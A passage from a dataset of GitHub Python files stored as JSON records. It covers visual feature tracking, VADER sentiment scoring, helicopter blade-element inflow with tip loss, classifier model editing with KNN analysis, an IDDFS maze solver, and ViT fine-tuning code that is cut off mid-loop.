axis=1)\n\t\t\t\n\t\t\tself.forwframe_['keyPoint'] = vecPoint_tracked\n\t\t\tself.forwframe_['PointID'] = PointID_tracked\n\t\t\tself.forwframe_['descriptor'] = Descr_tracked\n\n\t\tif not self.no_display :\t\n\t\t\tout1 = (np.dstack((self.curframe_['image'], self.curframe_['image'], self.curframe_['image'])) * 255.).astype('uint8')\n\t\t\tfor i in range(len(self.curframe_['PointID'])):\n\t\t\t\tpts1 = (int(round(self.curframe_['keyPoint'][0,i]))-3, int(round(self.curframe_['keyPoint'][1,i]))-3)\n\t\t\t\tpts2 = (int(round(self.curframe_['keyPoint'][0,i]))+3, int(round(self.curframe_['keyPoint'][1,i]))+3)\n\t\t\t\tpt2 = (int(round(self.curframe_['keyPoint'][0,i])), int(round(self.curframe_['keyPoint'][1,i])))\n\t\t\t\tcv2.rectangle(out1, pts1, pts2, (0,255,0))\n\t\t\t\tcv2.circle(out1, pt2, 2, (255, 0, 0), -1)\n\t\t\t\t# cv2.putText(out1, str(self.curframe_['PointID'][i]), pt2, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX , 0.3, (0, 0, 255), lineType=5)\n\t\t\tcv2.putText(out1, 'pre_image Point', (4, 12), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), lineType=16)\n\n\t\t\tout2 = (np.dstack((self.forwframe_['image'], self.forwframe_['image'], self.forwframe_['image'])) * 255.).astype('uint8')\n\t\t\tfor i in range(len(self.forwframe_['PointID'])):\n\t\t\t\tpts1 = (int(round(self.forwframe_['keyPoint'][0,i]))-3, int(round(self.forwframe_['keyPoint'][1,i]))-3)\n\t\t\t\tpts2 = (int(round(self.forwframe_['keyPoint'][0,i]))+3, int(round(self.forwframe_['keyPoint'][1,i]))+3)\n\t\t\t\tpt2 = (int(round(self.forwframe_['keyPoint'][0,i])), int(round(self.forwframe_['keyPoint'][1,i])))\n\t\t\t\tcv2.rectangle(out2, pts1, pts2, (0,255,0))\n\t\t\t\tcv2.circle(out2, pt2, 2, (0, 0, 255), -1)\n\t\t\t\t# cv2.putText(out2, str(self.forwframe_['PointID'][i]), pt2, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 0.3, (0, 0, 255), lineType=5)\n\t\t\tcv2.putText(out2, 'cur_image Point', (4, 12), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), lineType=16)\n\n\t\t\tmin_conf = 0.001\n\t\t\theatmap[heatmap < min_conf] = min_conf\n\t\t\theatmap = -np.log(heatmap)\n\t\t\theatmap = (heatmap - heatmap.min()) / (heatmap.max() - heatmap.min() + .00001)\n\t\t\tout3 = myjet[np.round(np.clip(heatmap*10, 0, 9)).astype('int'), :]\n\t\t\tout3 = (out3*255).astype('uint8')\n\n\t\t\tout = np.hstack((out1, out2, out3))\n\t\t\tout = cv2.resize(out, (3*self.width, self.height))\n\n\t\t\tcv2.namedWindow(\"feature detector window\",1)\n\t\t\t# cv2.resizeWindow(\"feature detector window\", 640*3, 480)\n\t\t\tcv2.imshow('feature detector window',out)\n\t\t\tcv2.waitKey(1)\n\n\t\tself.curframe_ = copy.deepcopy(self.forwframe_)\n\n", "repo_name": "GuoFeng-X/CNN_VINS", "sub_path": "Visual-Front/feature_match.py", "file_name": "feature_match.py", "file_ext": "py", "file_size_in_byte": 8757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 39, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.feature_process.SuperPointFrontend_torch", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.feature_process.PointTracker", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 67, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 68, 
"usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "time.time", "line_number": 109, "usage_type": "call"}, {"api_name": "time.time", "line_number": 131, "usage_type": "call"}, {"api_name": "time.time", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 190, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 191, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 193, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.dstack", "line_number": 195, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 200, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 201, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 203, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 203, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 212, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 213, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 215, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 217, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 218, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 220, "usage_type": "call"}]} +{"seq_id": "22903032501", "text": "from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nimport numpy as np\n\n\n####### Write your primary function here\ndef sentiment_scores(sentence):\n sent_keys = [\"Negative\", \"Neutral\", \"Positive\"]\n # Create a SentimentIntensityAnalyzer object.\n sid_obj = SentimentIntensityAnalyzer()\n\n # polarity_scores method of SentimentIntensityAnalyzer\n # object gives a sentiment dictionary.\n sentiment_dict = sid_obj.polarity_scores(sentence)\n sent_values = [x for x in sentiment_dict.values()]\n sent_values=sent_values[:3]\n # find the index of the max value\n\n index_max = 
np.argmax(sent_values)\n\n # decide sentiment as positive, negative and neutral\n final = sent_keys[index_max]\n # responses\n response1=f\"Overall sentiment is {final} with scores: {sentiment_dict}\"\n return response1\n", "repo_name": "plotly-dash-apps/603-movie-reviews-sentiment", "sub_path": "helpers/vader.py", "file_name": "vader.py", "file_ext": "py", "file_size_in_byte": 835, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "10659317267", "text": "## Minor Project code - 2\n## Coded by : G R Krishna Chand Avatar, Kumar Gaurav, Kashish Korotania\n## BEMT - Inflow Distribution and including the Tip Losses\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef prandtl_tip_loss(r,theta):\n global N_b, sol, cl_a, lam_c\n err = 1\n lam_old = (sol*cl_a/16)*(math.sqrt(1 + 32*theta*r/(sol*cl_a)) - 1)\n while(err > 1e-5):\n f = 0.5*N_b*(1-r)/lam_old \n\t\t# f_root = 0.5*N_b*r**2/(1-r)/lam_old\n F = (2/math.pi)*math.acos(math.exp(-f))\n # lam_new = (sol*cl_a/(16*F))*(math.sqrt(1 + 32*F*theta*r/(sol*cl_a)) - 1)\n lam_new = - (sol*cl_a/(16*F) - lam_c/2) + math.sqrt((sol*cl_a/16/F - lam_c/2)**2 + sol*cl_a*theta*r/8/F)\n err = abs(lam_new - lam_old)\n lam_old = lam_new\n return(lam_old) \n# Constant Parameters\nsol = 0.0578 #Solidity\ncl_a = 6.28 #Cl_a\nN_b = 4 #Number of Blades\nlam_c = 0.1 # Non-dimensional axial velocity\n#Initialising Parameters \nr = np.linspace(0,0.999999,500)\nN = len(r)\n# Computation for varying theta\ntheta_o = 10 # pitch angle at root\ntheta_tw = -2.5 # linear twist rate\nth = [] # Theta - pitch angle distribution\ndel_ct = [] # Coefficient of thrust\nlam = [] # Inflow distribution\nlam_no_tip = [] \ndel_ct_no_tip = [] \nfor i in range(N):\n theta = theta_o + theta_tw*r[i]\n th = th + [theta*math.pi/180]\nfor i in range(N):\n lam_t = prandtl_tip_loss(r[i],th[i])\n lam = lam + [lam_t]\n lam_no_tip_t = -(sol*cl_a/16 - lam_c/2) + math.sqrt((sol*cl_a/16 - lam_c/2)**2 + sol*cl_a*th[i]*r[i]/8)\n lam_no_tip = lam_no_tip + [lam_no_tip_t]\n del_ct_t = 0.5*(sol*cl_a)*(th[i]*r[i]**2 - lam_t*r[i])\n del_ct = del_ct + [del_ct_t]\n del_ct_no_tip_t = 0.5*(sol*cl_a)*(th[i]*r[i]**2 - lam_no_tip_t*r[i])\n del_ct_no_tip = del_ct_no_tip + [del_ct_no_tip_t]\n\n# Plotting \nplt.plot(r,lam,'b', label='BEMT+Vortex theory')\nplt.plot(r,lam_no_tip, 'm--', label='BEMT')\nplt.xlabel('Non-dimensional radius (r)')\nplt.ylabel('Inflow ratio (lambda)')\nplt.legend(loc=4)\nplt.xticks(np.arange(0,1.1,0.1))\n#plt.ylabel('Inflow ratio (lam)')\nplt.grid(True)\nplt.title('Inflow ratio distribution for theta_root = '+str(theta_o)+' degrees, linear twist rate = '+ str(theta_tw))\nplt.show()\n", "repo_name": "kcavatar/helicopters", "sub_path": "bemt/bemt_including_tip_loss_inflow.py", "file_name": "bemt_including_tip_loss_inflow.py", "file_ext": "py", "file_size_in_byte": 2257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "math.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 14, "usage_type": "attribute"}, {"api_name": "math.acos", "line_number": 14, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 14, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 16, "usage_type": "call"}, 
{"api_name": "numpy.linspace", "line_number": 26, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 38, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "72557262247", "text": "import argparse\nimport collections\nimport torch\nimport numpy as np\nimport os, sys\n\nfrom test_CINIC10 import predict\nsys.path.insert(0, 'src')\nimport data_loader.data_loaders as module_data\nimport model.loss as module_loss\nimport model.metric as module_metric\nimport model.model as module_arch\nfrom trainer.editor import Editor\nfrom parse_config import ConfigParser\nfrom trainer import Trainer\nfrom utils import prepare_device, copy_file, read_lists, write_pickle\nfrom utils.edit_utils import prepare_edit_data\nfrom utils.analysis import knn\n\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(SEED)\n\ndef main(config):\n logger = config.get_logger('train')\n assert config.config['method'] == 'edit', \"Invalid method '{}'. 
Must be 'edit'\".format(config.config['method'])\n K = config.config['editor']['K'] # for KNN\n save_dir = str(config.save_dir)\n\n # build model architecture, then print to console\n config.config['arch'].update()\n layernum = config.config['layernum']\n model = config.init_obj('arch', module_arch, layernum=layernum)\n\n\n logger.info(\"Created {} model with {} trainable parameters\".format(config.config['arch']['type'], model.get_n_params()))\n if model.get_checkpoint_path() != \"\":\n logger.info(\"Restored weights from {}\".format(model.get_checkpoint_path()))\n else:\n logger.info(\"Training from scratch.\")\n\n # Create test data loader for metric calculations\n test_data_loader = config.init_obj('data_loader', module_data, split='test')\n logger.info(\"Created test data loader\")\n\n # Prepare for (multi-device) GPU training\n device, device_ids = prepare_device(config['n_gpu'])\n model = model.to(device)\n if len(device_ids) > 1:\n model = torch.nn.DataParallel(model, device_ids=device_ids)\n model.eval() # model should always be in eval() for editing\n\n # Get function handles for loss and metrics\n loss_fn = getattr(module_loss, config['loss'])\n metric_fns = [getattr(module_metric, met) for met in config['metrics']]\n\n # Run initial accuracy check on unedited model\n pre_edit_log = predict(\n data_loader=test_data_loader,\n model=model,\n loss_fn=loss_fn,\n metric_fns=metric_fns,\n device=device)\n\n # Log pre-edit results and save to torch file\n logger.info(\"Metrics before editing: {}\".format(pre_edit_log))\n metric_save_path = os.path.join(save_dir, \"pre_edit_test_metrics.pth\")\n torch.save(pre_edit_log, metric_save_path)\n # write_pickle(pickle_path, pre_edit_log)\n\n # Prepare data for edit\n key_image_path = config.config['editor']['key_image_path']\n key_image_paths = read_lists(key_image_path)\n value_image_path = config.config['editor']['value_image_path']\n value_image_paths = read_lists(value_image_path)\n mask_path = config.config['editor']['mask_path']\n\n\n if mask_path != \"\":\n mask_paths = read_lists(mask_path)\n else:\n mask_paths = None\n\n logger.info(\"Key images: {}\".format(key_image_paths))\n logger.info(\"Value images: {}\".format(value_image_paths))\n logger.info(\"Masks: {}\".format(mask_paths))\n\n edit_data = prepare_edit_data(\n key_image_paths=key_image_paths,\n value_image_paths=value_image_paths,\n mask_paths=mask_paths,\n image_size=(32, 32))\n logger.info(\"Prepared data for editing\")\n\n if K > 0:\n # Provide dataloader to perform KNN\n val_paths_data_loader = config.init_obj(\n 'data_loader',\n module_data,\n split='valid',\n return_paths=True)\n logger.info(\"Created validation data loader for KNN calculations\")\n # Concatenate key and value images together\n # First is keys, second is values\n # labels of 'modified_imgs' and 'imgs' are misleading but from the original Editing a Classifier repo\n anchor_images = torch.cat([edit_data['modified_imgs'], edit_data['imgs']], dim=0)\n pre_edit_knn_save_path = os.path.join(save_dir, \"pre_edit_{}-nn.pth\".format(K))\n logger.info(\"Performing KNN on validation dataset\")\n pre_edit_knn = knn(\n K=K,\n data_loader=val_paths_data_loader,\n model=model,\n anchor_image=anchor_images,\n data_types=['features', 'logits', 'images'],\n device=device,\n save_path=pre_edit_knn_save_path)\n logger.info(\"Saving pre-edit KNN results with K={} to {}\".format(K, pre_edit_knn_save_path))\n\n\n # Always use the dummy val_data_loader for covariance calculation\n covariance_data_loader_path = 
\"data/cinic-10-imagenet-dummy\"\n val_data_loader = module_data.CINIC10DataLoader(\n data_dir=covariance_data_loader_path,\n batch_size=256,\n shuffle=False,\n normalize=False,\n num_workers=8,\n split='valid')\n logger.info(\"Created dataloader for covariance matrix from {} ({})\".format(covariance_data_loader_path, 'valid'))\n\n\n\n # Set up editor\n editor_args = config.config['editor']['args']\n editor_args['arch'] = config.config['arch']['args']['type']\n\n editor = Editor(\n # model=model,\n val_data_loader=val_data_loader,\n **editor_args)\n\n # Create path for caching directory based on\n # (1) validation data dir\n # (2) context model -- architecture, layer number\n val_data_name = val_data_loader.get_data_name()\n model_arch = model.get_type()\n # layernum = editor.get_layernum()\n cache_dir = os.path.join('cache', val_data_name, \"{}-{}\".format(model_arch, layernum))\n logger.info(\"Looking for covariance matrix weights in {}\".format(cache_dir))\n # Perform edit\n editor.edit(\n edit_data=edit_data,\n model=model,\n cache_dir=cache_dir)\n\n model.save_model(save_path=os.path.join(config._save_dir, \"edited_model.pth\"))\n # Evaluate again on test set\n logger.info(\"Evaluating edited model on test set...\")\n post_edit_log = predict(\n data_loader=test_data_loader,\n model=model,\n loss_fn=loss_fn,\n metric_fns=metric_fns,\n device=device)\n\n # Log post-edit results and save to torch file\n logger.info(\"Metrics after editing: {}\".format(post_edit_log))\n metric_save_path = os.path.join(save_dir, \"post_edit_test_metrics.pth\")\n torch.save(post_edit_log, metric_save_path)\n # write_pickle(pickle_path, post_edit_log)\n\n\n # Perform post edit KNN analysis\n if K > 0:\n # # Concatenate key and value images together\n # anchor_images = torch.cat([edit_data['modified_imgs'], edit_data['imgs']], dim=0)\n post_edit_knn_save_path = os.path.join(save_dir, \"post_edit_{}-nn.pth\".format(K))\n logger.info(\"Performing KNN on validation dataset\")\n pre_edit_knn = knn(\n K=K,\n data_loader=val_paths_data_loader,\n model=model,\n anchor_image=anchor_images,\n data_types=['features', 'logits', 'images'],\n device=device,\n save_path=post_edit_knn_save_path)\n logger.info(\"Saving post-edit KNN results with K={} to {}\".format(K, post_edit_knn_save_path))\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=None, type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str,\n help='indices of GPUs to enable (default: all)')\n\n # custom cli options to modify configuration from default values given in json file.\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = [\n CustomArgs(['--lr', '--learning_rate'], type=float, target='optimizer;args;lr'),\n CustomArgs(['--bs', '--batch_size'], type=int, target='data_loader;args;batch_size'),\n CustomArgs(['--name'], type=str, target='name')\n ]\n parsed_args = args.parse_args()\n\n config = ConfigParser.from_args(args, options)\n main(config)\n", "repo_name": "allisonchen23/model-editing", "sub_path": "old_src/edit_knn.py", "file_name": "edit_knn.py", "file_ext": "py", "file_size_in_byte": 8243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 8, 
"usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.backends", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "model.loss", "line_number": 37, "usage_type": "name"}, {"api_name": "model.model", "line_number": 37, "usage_type": "argument"}, {"api_name": "model.loss.get_n_params", "line_number": 40, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 40, "usage_type": "name"}, {"api_name": "model.loss.get_checkpoint_path", "line_number": 41, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 41, "usage_type": "name"}, {"api_name": "model.loss.get_checkpoint_path", "line_number": 42, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 42, "usage_type": "name"}, {"api_name": "data_loader.data_loaders", "line_number": 47, "usage_type": "argument"}, {"api_name": "utils.prepare_device", "line_number": 51, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 52, "usage_type": "name"}, {"api_name": "model.loss.to", "line_number": 52, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.DataParallel", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "model.loss.eval", "line_number": 55, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 55, "usage_type": "name"}, {"api_name": "model.loss", "line_number": 58, "usage_type": "argument"}, {"api_name": "model.metric", "line_number": 59, "usage_type": "argument"}, {"api_name": "test_CINIC10.predict", "line_number": 62, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 64, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.edit_utils.prepare_edit_data", "line_number": 92, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 103, "usage_type": "argument"}, {"api_name": "torch.cat", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.analysis.knn", "line_number": 113, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 116, "usage_type": "name"}, {"api_name": "data_loader.data_loaders.CINIC10DataLoader", "line_number": 126, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 126, "usage_type": "name"}, {"api_name": "trainer.editor.Editor", "line_number": 141, "usage_type": "call"}, {"api_name": "model.loss.get_type", "line_number": 150, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 150, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 152, "usage_type": "attribute"}, {"api_name": "model.loss", "line_number": 157, "usage_type": "name"}, {"api_name": "model.loss.save_model", "line_number": 160, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 160, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "test_CINIC10.predict", "line_number": 163, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 165, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "utils.analysis.knn", "line_number": 183, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 186, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 195, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 204, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser.from_args", "line_number": 212, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser", "line_number": 212, "usage_type": "name"}]} +{"seq_id": "11764670549", "text": "from Maze import Maze\nfrom datetime import datetime\nfrom queue import heappop, heappush, deque\n\nclass MazeSolverIDDFS():\n startT = datetime.now()\n def __init__(self,maze):\n self.maze = maze\n\n\n def IDDFS(self):\n \n start = self.maze.getCell(0, 0)\n goal = self.maze.getCell(self.maze.size-1, self.maze.size-1)\n prev_iter_visited, depth = [], 0\n while True:\n traced_path, visited = self.DLS(start, goal, depth)\n if traced_path or len(visited) == len(prev_iter_visited): return traced_path\n else: prev_iter_visited = visited; depth += 1\n \n\n def DLS(self, start, goal, limit=-1):\n \n found, fringe, visited, came_from = False, deque([(0, start)]), set([start]), {start: None}\n while not found and len(fringe):\n depth, current = fringe.pop()\n if current == goal: found = True; break\n if limit == -1 or depth < limit:\n for node in current.edges.values():\n if node not in visited:\n visited.add(node); fringe.append((depth + 1, node))\n came_from[node] = current\n if found: print(\"IDDFS total time run \",datetime.now()-self.startT,\" total expanded cells:\",len(visited)+1,\" optimum path lenght: \",self.maze.optimum); return came_from, visited\n else: return None, visited\n", "repo_name": "n6parmak/Maze-Generator-Solver", "sub_path": "MazeSolverIDDFS.py", "file_name": "MazeSolverIDDFS.py", "file_ext": "py", "file_size_in_byte": 1403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "queue.deque", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "24410508495", "text": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nimport os\nimport random\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom 
torch.utils.data import Dataset, DataLoader\nfrom pytorch_pretrained_vit import ViT\nfrom p1_dataset import p1_data\n\n# Set random seed for reproducibility\nmanualSeed = 0\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n\nbatch_size = 8\nworkers = 2\nlr = 1e-5\nweight_decay = 1e-5\nnum_epochs = 30\nnum_classes = 37\n\n\nroot = 'hw3_data/p1_data'\nmodel_dir = './p1_models'\nos.makedirs(model_dir, exist_ok=True)\n\ntrain_dir = os.path.join(root, 'train')\nvalid_dir = os.path.join(root, 'val')\n\ntrain_tfm = transforms.Compose([\n transforms.RandomRotation(30), \n transforms.RandomResizedCrop(384, scale=(0.8, 1.0)),\n transforms.ColorJitter(brightness=0.3),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\ntest_tfm = transforms.Compose([\n transforms.Resize((384, 384)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n\ntrain_dataset = p1_data(train_dir, mode='train', transform=train_tfm)\nvalid_dataset = p1_data(valid_dir, mode='valid', transform=test_tfm)\n\n# Create the dataloader\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=workers)\nvalid_loader = DataLoader(valid_dataset, batch_size=batch_size, shuffle=False, num_workers=workers)\n\n# Decide which device we want to run on\ndevice = torch.device(\"cuda\" if (torch.cuda.is_available()) else \"cpu\")\n\nmodel = ViT('B_16_imagenet1k', pretrained=True, num_classes=num_classes)\nmodel = model.to(device)\nprint(model)\n\n# Initialize Loss function\ncriterion = nn.CrossEntropyLoss()\n\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n\n\n# Training Loop\ntrain_losses = []\n\nfor epoch in range(num_epochs):\n\n # ---------- Training ----------\n # Make sure the model is in train mode before training.\n model.train()\n\n # These are used to record information in training.\n train_loss = []\n train_accs = []\n\n # Iterate the training set by batches.\n for i, batch in enumerate(train_loader):\n \n # A batch consists of image data and corresponding labels.\n imgs, labels = batch\n labels = labels.long().to(device)\n \n # Forward the data. 
(Make sure data and model are on the same device.)\n logits = model(imgs.to(device))\n \n # Calculate the cross-entropy loss.\n # We don't need to apply softmax before computing cross-entropy as it is done automatically.\n loss = criterion(logits, labels)\n\n # Gradients stored in the parameters in the previous step should be cleared out first.\n optimizer.zero_grad()\n \n # Compute the gradients for parameters.\n loss.backward()\n \n # Update the parameters with computed gradients.\n optimizer.step()\n \n # Compute the accuracy for current batch.\n acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()\n \n # Record the loss and accuracy.\n train_loss.append(loss.item())\n train_accs.append(acc)\n\n # The average loss and accuracy of the training set is the average of the recorded values.\n train_loss = sum(train_loss) / len(train_loss)\n train_acc = sum(train_accs) / len(train_accs)\n train_losses.append(train_loss)\n # Print the information.\n print(f\"[{epoch+1:03d}/{num_epochs:03d}] loss = {train_loss:.5f}, acc = {train_acc:.5f}\")\n torch.save(model.state_dict(), os.path.join(model_dir, 'p1_model.pth'))\n\nplt.figure(figsize=(10,5))\nplt.title(\"Training Loss\")\nplt.plot(train_losses,label=\"train\")\nplt.xlabel(\"iterations\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.savefig(\"./p1_Loss.png\")\n\n# Testing\nprint('Testing started!')\nmodel.eval()\ntest_hit = 0\nfor i, batch in enumerate(valid_loader):\n imgs, labels = batch\n with torch.no_grad():\n logits = 